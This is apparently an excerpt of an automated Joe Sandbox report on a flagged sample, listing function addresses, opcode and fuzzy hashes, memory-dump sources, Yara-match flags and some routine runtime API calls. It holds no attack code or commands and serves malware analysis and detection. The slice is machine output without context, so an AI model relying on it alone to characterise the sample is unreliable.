                                                      • Opcode ID: 7a517bb57c8255d04b37593667fdc9cab60e845dda2df1a77e5b8b1f79827999
                                                      • Instruction ID: ba450b0eaabadebf7bf12891344773e5e148818387a9e385344a96ace04e1a75
                                                      • Opcode Fuzzy Hash: 7a517bb57c8255d04b37593667fdc9cab60e845dda2df1a77e5b8b1f79827999
                                                      • Instruction Fuzzy Hash: 834125F2B0D200DBDB05AF28DD4167EB7FAAFD4720F25892DA6C38A244E6344551A747
                                                      Function 0090A01B Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c2e83aef430610588c6185441fa360d859c64e5cf2877481c15460d60a78b75
                                                      • Instruction ID: c85c610aac1ae450dd3e88d25a510fad86fd1354b13b913e6af238a5ef3d6730
                                                      • Opcode Fuzzy Hash: 9c2e83aef430610588c6185441fa360d859c64e5cf2877481c15460d60a78b75
                                                      • Instruction Fuzzy Hash: A5418EF3E085205BE304A92DEC9577ABAD9EB84350F1B453DDBCAD7780E579480583C6
                                                      Function 04CC8DB3 Relevance: .1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                      • Instruction ID: 670df983459753a0512b5a58a07885cec9908419fe784b36a9610753d176da40
                                                      • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                      • Instruction Fuzzy Hash: EA518BB1E00305CBEB24DF59D9817AABBF2FB48316F54842ED801EB354D378AA51CB65
                                                      Function 009AE68D Relevance: .1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmp, Offset: 00995000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_995000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26ede7b83a3b20f5970b90982f55750ab434896f7bde2d30179b5b049f482c42
                                                      • Instruction ID: 2a6f7bc8d4ac9028b6f2ce96bf5153ebb867315e1d7a55cbbe99c86dca134d93
                                                      • Opcode Fuzzy Hash: 26ede7b83a3b20f5970b90982f55750ab434896f7bde2d30179b5b049f482c42
                                                      • Instruction Fuzzy Hash: 40316DF250C204AFE305BF19DD4167AFBE9EB95320F124D2DE6C583250E73658548B97
                                                      Function 0041A512 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                      • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                                      • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                      • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                                      Function 04CD9912 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                      • Instruction ID: 1ea915fd4c5f511d9f5b0d8a1f6f204921137ab709b3649cc0da16d08ab883fa
                                                      • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                      • Instruction Fuzzy Hash: B821B373F204394B7B0CC57ECC522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                      Function 04B2A779 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                      • Instruction ID: e0e9d76f2c7fb020a334e7dde6a651108db725e2b8a2ced61e0cec10eaa5ca00
                                                      • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                      • Instruction Fuzzy Hash: 0E21B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                      Function 00854586 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099da9a1228d25c542d651f51d22079af07c1f50e84ff8786a4f1d786521df5b
                                                      • Instruction ID: d6a7b9517844663ae29f8d7be2f3b870aadce822d438c8e57ef367e7a5bfaba3
                                                      • Opcode Fuzzy Hash: 099da9a1228d25c542d651f51d22079af07c1f50e84ff8786a4f1d786521df5b
                                                      • Instruction Fuzzy Hash: 0221E4A3B042284BF3546C3CDD58376769ADB85310F2A8138DB5097B98DD399D058299
                                                      Function 0041A3F2 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                      • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                                      • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                      • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                                      Function 04CD97F2 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                      • Instruction ID: 3343423ee0e75ad14021e961ae993e6f530b5a57008482648aff5e8ed9c07bd2
                                                      • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                      • Instruction Fuzzy Hash: 0F11A363F30C256B675C81698C132BAA1D2EBD814070F433AD826E7284E8A4EE23D290
                                                      Function 04B2A659 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                      • Instruction ID: d05d9554c2abf63642ec90558bbe68fb3e91d0f2e227fb2f7e139d196ac3f5e7
                                                      • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                      • Instruction Fuzzy Hash: F711A323F30C255B675C81A98C172BAA1D2EBDC14030F433AD826E7284E9A4EE23D290
                                                      Function 0040A960 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                                      Function 04CC9D60 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: f56eaead2c0999e6925c04ecf0a0ae6385cce3ae2a9078c730e7981c0991b618
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 341104F724018243D6048A2EC8F4AF7E797EBC632172D426ED0425BB5CD633F345A600
                                                      Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                      Function 04B1ABC7 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: 412d0b4b3a0063d5a2116836dd3d7d26472ee5193748025585215475def23443
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: B91108B73431C1479715CA2DDDB45B7E796EBCE3207AC46FAD0414B778D122F5459600
                                                      Function 00CFADA3 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2240532857.0000000000CFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_cfa000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction ID: bb6f633e447705bdda48fb732446c00ed62d46bf676a6ae9828bbf1c1c820b27
                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction Fuzzy Hash: 231182B27401059FD784DF55DCC1FA6B3EAEB89320B298055EE08CB312D675EC42C761
                                                      Function 04B10D90 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction ID: a07f77ad5466490949f85520786e28ada8546812f30b2e1454bb2630bbc0aed1
                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction Fuzzy Hash: 1001F772B006008FDF21DF20C844BAA33E5EBC6205F8548E4E90AD7695E370B8818B80
                                                      Function 0041366F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                      • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                                      • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                      • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                                      Function 04CD2A6F Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                      • Instruction ID: e670cb87dabd1f777da98bb9ce02e586a5aa969ee9b8f957b1bab25a67518cfa
                                                      • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                      • Instruction Fuzzy Hash: 90E08C32911238EBCB24DB9DC90498AF3EDEB44B00B5544A6B605D3100C370EE00E7D0
                                                      Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                      • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                      • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                      • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                      Function 04B238D6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                      • Instruction ID: 1070034d5e1a68445230098958f832ba82e7432470b7004166592ec64584f0a6
                                                      • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                      • Instruction Fuzzy Hash: 3DE08C72921238EBCB24DB9CCA05D8AF3FCEB45B40B114496B905D3100C274EE00C7D0
                                                      Function 04CCE30D Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                                      • Instruction ID: 318d2492d9357419cc1ca1ad18f1bceabbc43f795f032deadc895215e5a3ab9e
                                                      • Opcode Fuzzy Hash: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                                      • Instruction Fuzzy Hash: 1EE04631440108BFCB127F14CC48D893F2AEB41241B084428F90986131CB35FE82DA94
                                                      Function 00409088 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                                      • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                                      • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                                      Strings
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                                      • SleepConditionVariableCS, xrefs: 004090BC
                                                      • kernel32.dll, xrefs: 004090AB
                                                      • WakeAllConditionVariable, xrefs: 004090C8
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                      • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                                      • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                      • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                                      Function 004171E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00417227
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                                        • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                                      • _free.LIBCMT ref: 0041721C
                                                        • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                        • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                      • _free.LIBCMT ref: 0041723E
                                                      • _free.LIBCMT ref: 00417253
                                                      • _free.LIBCMT ref: 0041725E
                                                      • _free.LIBCMT ref: 00417280
                                                      • _free.LIBCMT ref: 00417293
                                                      • _free.LIBCMT ref: 004172A1
                                                      • _free.LIBCMT ref: 004172AC
                                                      • _free.LIBCMT ref: 004172E4
                                                      • _free.LIBCMT ref: 004172EB
                                                      • _free.LIBCMT ref: 00417308
                                                      • _free.LIBCMT ref: 00417320
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                      • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                                      • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                      • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                                      Function 04CD65E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 04CD661C
                                                      • ___free_lconv_mon.LIBCMT ref: 04CD6627
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD6300
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD6312
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD6324
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD6336
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD6348
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD635A
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD636C
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD637E
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD6390
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD63A2
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD63B4
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD63C6
                                                        • Part of subcall function 04CD62E3: _free.LIBCMT ref: 04CD63D8
                                                      • _free.LIBCMT ref: 04CD663E
                                                      • _free.LIBCMT ref: 04CD6653
                                                      • _free.LIBCMT ref: 04CD665E
                                                      • _free.LIBCMT ref: 04CD6680
                                                      • _free.LIBCMT ref: 04CD6693
                                                      • _free.LIBCMT ref: 04CD66A1
                                                      • _free.LIBCMT ref: 04CD66AC
                                                      • _free.LIBCMT ref: 04CD66E4
                                                      • _free.LIBCMT ref: 04CD66EB
                                                      • _free.LIBCMT ref: 04CD6708
                                                      • _free.LIBCMT ref: 04CD6720
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 3658870901-0
                                                      • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                      • Instruction ID: cbfbeacdb91535342280328609c0024332cedeb92772a9c44ef8d46580cb2083
                                                      • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                      • Instruction Fuzzy Hash: 083149317002049FEB21AE79DC44B5A77EAAF00318F18882AE299D7591DF75FA91DB24
                                                      Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
